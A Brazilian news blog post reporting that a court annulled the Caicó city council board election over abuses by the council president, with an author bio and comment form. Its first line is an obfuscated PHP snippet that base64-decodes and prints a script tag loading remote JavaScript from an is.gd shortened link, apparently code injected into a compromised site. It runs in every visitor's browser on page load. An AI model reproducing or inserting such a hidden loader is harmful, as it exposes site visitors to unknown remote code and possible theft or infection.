$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Justiça anula eleição para Mesa da Câmara de Caicó, irregularidades foram cometidas pelo atual presidente do Legislativo

Justiça anula eleição para Mesa da Câmara de Caicó, irregularidades foram cometidas pelo atual presidente do Legislativo
30 Nov 2018

A Justiça determinou nulidade da eleição da Mesa Diretora da Câmara Municipal de Caicó que atuaria no biênio 2019-2020. O advogado Leonardo Dias, do RRC Advogados, apontou, na tese acatada pelo Judiciário, que o atual presidente do Legislativo cometeu diversas irregularidades no processo de sucessão, inclusive negando registro de candidatura para parlamentares, sem qualquer justificativa plausível.

O Judiciário reconheceu que no ato da disputa outros postulantes à Mesa Diretora poderiam concorrer e foram negados pelo presidente da Câmara, o que se configura ato “abusivo e ilegal”.
Será feita uma nova eleição para a Câmara Municipal de Caicó.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *